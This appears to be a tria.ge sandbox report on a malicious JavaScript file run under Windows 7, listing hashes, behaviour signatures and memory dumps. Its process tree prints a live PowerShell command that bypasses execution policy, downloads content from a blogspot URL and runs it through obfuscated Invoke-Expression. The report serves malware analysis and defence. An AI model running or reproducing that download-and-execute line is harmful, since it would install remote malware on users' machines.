Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

14101_4701...023.js

windows7-x64

7

14101_4701...023.js

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    20/12/2023, 20:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    14101_4701799_4544166_19-DEC-2023.js

  • Size

    75KB

  • MD5

    5adec410f9939264652439b0b577f816

  • SHA1

    bf81a4fe9d6ef714b2a159307f2d6d6dec8392bb

  • SHA256

    e442eeceddf82c688a044f671abd042075676a058075038a00e2555f418b8888

  • SHA512

    818f9682bb81cee94228c42078069f4a9e327bdfdd4b7d5b24698636b72f23fee9fb95e227e402380f4772533666da9517580507e6a5cc40da902e49c4b335b2

  • SSDEEP

    96:9pVIq5KviVtbEx5R17Lub5MHaPw2lSGS6oDFyMP:9sviW7Lub5MHaPw2lSGS6oDFyMP

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\14101_4701799_4544166_19-DEC-2023.js
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:3004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm hopelnew24.blogspot.com//////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 5
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2384

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2384-4-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2384-5-0x0000000002790000-0x0000000002798000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2384-6-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2384-8-0x0000000002CF0000-0x0000000002D70000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2384-7-0x0000000002CF0000-0x0000000002D70000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2384-10-0x0000000002CF0000-0x0000000002D70000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2384-9-0x0000000002CF0000-0x0000000002D70000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2384-11-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2384-12-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

    Filesize

    9.6MB

    Download